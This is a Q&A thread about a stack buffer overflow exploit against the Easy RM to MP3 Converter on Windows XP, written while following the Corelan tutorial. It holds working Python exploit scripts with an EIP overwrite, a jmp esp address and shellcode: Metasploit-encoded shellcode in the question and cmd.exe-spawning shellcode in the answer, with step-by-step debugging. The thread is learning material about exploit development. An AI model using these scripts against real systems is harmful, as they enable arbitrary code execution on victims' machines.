# Why is fnstenv giving me a NULL address in my shellcode on Windows XP?

Tags: exploit, buffer-overflow, shellcode

I am going through an introductory tutorial on writing exploits, which can be [found here](https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/). The tutorial goes over a simple stack based buffer overflow vulnerability in the Easy RM to MP3 Conversion Utility. I had the basic PoC working (although, I found a different offset to overwrite EIP than the author even though I used the same version). In other words, I was able to take control over EIP and have it jump into a nopsled before the shellcode, and the test shellcode containing only a break instruction worked perfectly fine. However, I seem to be running into issues when using real shellcode generated with metasploit (as shown on the tutorial). Here is the Python script I wrote while following the tutorial (I didn't want to use Perl...):

```
from struct import pack

filename = "sploit.m3u"
junk = "A" * 26073
eip = pack("I", 0x7C86467B) # jmp esp
nop = "\x90"

preshell = "X" * 4

shellcode = nop*25
shellcode += "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1"
shellcode += "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30"
shellcode += "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa"
shellcode += "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"
shellcode += "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"
shellcode += "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
shellcode += "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83"
shellcode += "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98"
shellcode += "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61"
shellcode += "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05"
shellcode += "\x7f\xe8\x7b\xca"

payload = junk + eip + preshell + shellcode

with open(filename, "wb") as file:
    file.write(payload)
```

Here is what Windbg shows after the shellcode crashes (note that the jmp esp worked perfectly fine and that the exception occurred inside the shellcode):

[image]

After looking at the debugger, it seems that the problem is with the fnstenv instruction, which appears toward the beginning of the shellcode. From what I've found in [this Phrack article](http://phrack.org/issues/62/7.html), fnstenv is used as a way of getting EIP popping it off the stack into a register:

> Another interesting mechanism being use to obtain the EIP is to make 
>   use of a few special FPU instructions. This was implemented by Aaron 
>   Adams in Vuln-Dev mailing list in the discussion to create pure ASCII 
>   shellcode. The code uses fnstenv/fstenv instructions to save the 
>   state of the FPU environment.
>
> fldz
>
> fnstenv [esp-12]
>
> pop ecx
>
> add cl, 10
>
> nop
>
> ECX will hold the address of the EIP. However, these instructions 
>   will generate non-standard ASCII characters.

It seems like this is necessary/useful in order to decode the encoded shellcode. However, the address that gets popped from the stack after the fnstenv call always turns out to be NULL (0x00000000), and then the shellcode subsequently crashes. I even tried this exploit/shellcode on another Windows XP VM that I had (though I didn't originally set it up myself) and noticed the same result happening.

My question is simply, why is this happening? What would cause the fnstenv instruction to fail, resulting in a NULL address instead of EIP's address? Is there some setting I need to change (perhaps something with Virtualbox's hardware settings for the VM?) that is preventing this from working correctly?

Comment: I think this question is still unresolved

Answer (score 2, accepted):

Let's reverse engineer what happened:

- Access violation because you try to access 0x00000018
- Because `POP EAX` loads register zero
- It supposed to be `FPULastInstructionOpcode` according to [this x86 instruction set reference](http://x86.renejeschke.de/html/file_module_x86_id_119.html)

**But, look at your ESP value it is starting point of your shellcode. Why? Because you cannot write before that address. On the other hand you use [esp-0Ch] for storing FPU environment.**

I tried to run your version and get different error:

[image: first try]

**Also I tried Corelan version that didn't work either. As you can see things been more complicated in my version.**

I can't debug your version of exploit, however I can show you step by step constructing exploit to this vulnerability. I'm using **Easy RM to MP3 Converter 2.7.3.700** (setup 2.8 MiB) from [this Exploit Database page](https://www.exploit-db.com/exploits/10374/)  on my **Windows XP Professional SP3 Turkish**. First, i created 30000 characters long `Mona.py` pattern. Attach `RM2MP3Converter.exe` to **Immunity Debugger** and loaded our crafted **sploit.m3u** file.

[image: Program crash with mona pattern]

Using Python script [pattern.py](https://github.com/SaltwaterC/sploit-tools/blob/master/pattern.py) we can find EIP offset now *:

```
C:\Documents and Settings\Administrator\Desktop>pattern.py offset 0x48386B48 30000
hex pattern decoded as: Hk8H
5784
26064
```

Lets look where ESP points in stack:

[image: Follow ESP in stack]

You can either use 0Hl1 or hex value:

```
C:\Documents and Settings\Administrator\Desktop>pattern.py offset 0x316C4830 30000
hex pattern decoded as: 0Hl1
5792
26072
```

Lets check our findings:

```
filename = "sploit.m3u"
junk = "A" * 26064
s_eip = "B" * 4
junk2 = "C" * 4
p_esp = "D" * 4

payload = junk + s_eip + junk2 + p_esp

with open(filename, "wb") as file:
    file.write(payload)
```

Crash values confirms our pre-exploit:

[image: Analyzing pre-exploit]

```
from struct import pack

filename = "sploit.m3u"
junk = "A" * 26064
s_eip = pack("I", 0x77fab277)
junk2 = "C" * 4
p_esp = "\xCC" * 4

payload = junk + s_eip + junk2 + p_esp

with open(filename, "wb") as file:
    file.write(payload)
```

Now we need to find `JMP ESP` in an **executable segment**. Use this `Mona.py` command:

```
!mona find -type instr -s "JMP ESP" -x X
```

[image: Found lots of "JMP ESP"]

```
from struct import pack

filename = "sploit.m3u"
junk1 = "B" * 4
junk2 = "A" * 26060
s_eip = pack("I", 0x77fab277)
junk3 = "C" * 4
p_esp = "\xCC" * 4

payload = junk1 + junk2 + s_eip + junk3 + p_esp

with open(filename, "wb") as file:
    file.write(payload)
```

Thanks to `Mona.py` we found lots of "jmp esp" in OS libraries. Pick first one at 0x77fab277 address.

```
000FFD38   CCCCCCCC  ÌÌÌÌ
000FFD3C   00000000  ....
000FFD40   00BC004C  L.¼.
000FFD44   00104A58  XJ.
000FFD48   00000000  ....
000FFD4C   00000000  ....
000FFD50   42424242  BBBB
000FFD54   41414141  AAAA
000FFD58   41414141  AAAA
```

It hits our interrupt sequence where ESP points out. With little bit more trick we can land our shellcode with additional `ADD AH, CL`

[image: Nopsled and land on shellcode]

This is our Python code:

```
from struct import pack

filename = "sploit.m3u"
junk1 = ""
junk2 = "\xCC" * 26064
s_eip = pack("I", 0x77fab277)
junk3 = "A" * 4
p_esp = "\x90" * 31

payload = junk1 + junk2 + s_eip + junk3 + p_esp

with open(filename, "wb") as file:
    file.write(payload)
```

After a long debugging session we get:

[image: We get cmd.exe]

Python code:

```
from struct import pack

filename = "sploit.m3u"
junk1 = "F" * 2
junk1 += "B" * 8
junk1 += "\x90" * 20
shellcode = "\x8b\xec\x55\x8b\xec"
shellcode += "\x68\x65\x78\x65\x2F"
shellcode += "\x68\x63\x6d\x64\x2e"
shellcode += "\x8d\x45\xf8\x50\xb8"
shellcode += "\xc7\x93\xc1\x77"
shellcode += "\xff\xd0"
junk2 = "\xCC" * (26064-len(junk1)-len(shellcode))
s_eip = pack("I", 0x77fab277)
junk3 = "\x90" * 35

payload = junk1 + shellcode + junk2 + s_eip + junk3

with open(filename, "wb") as file:
    file.write(payload)
```

Different than Corelan and [this Exploit-db](https://www.exploit-db.com/exploits/10374/) version. You can find shellcode [here](http://shell-storm.org/shellcode/files/shellcode-573.php).

- We use double "F" to emulate a harmless instruction with remains of data in stack
- Eight "B" is for remainder, it didn't seem like it is written in anywhere.
- junk3 is written before shellcode you can use it jumping over data remains.

*Mona only finds first occurrence of sequence.

Comment: Thanks for the in depth reply! Oddly enough, I tried my script on a third XP VM (set up on a different computer but used the same XP ISO as the original VM I was on) and it worked perfectly with the original shell code. I'm still confused as to why my offset to overwriting EIP was different than yours and Corelan's, shouldn't that depend entirely on the binary?

Comment: Did you update any of them? Maybe different language or different OS libraries cause this. But, it is really interesting mostly I see this type of things in XP systems.

Comment: Same language settings and they came from the same ISO. I noticed the same behavior happen on the same physical machine with a different XP VM which I did not create, so I'm wondering if it has to do with the host hypervisor? Not sure though... maybe I should test that other VM on my laptop (where the XP VM worked )

Comment: Ellaborated answer, but it doesn't really answer the question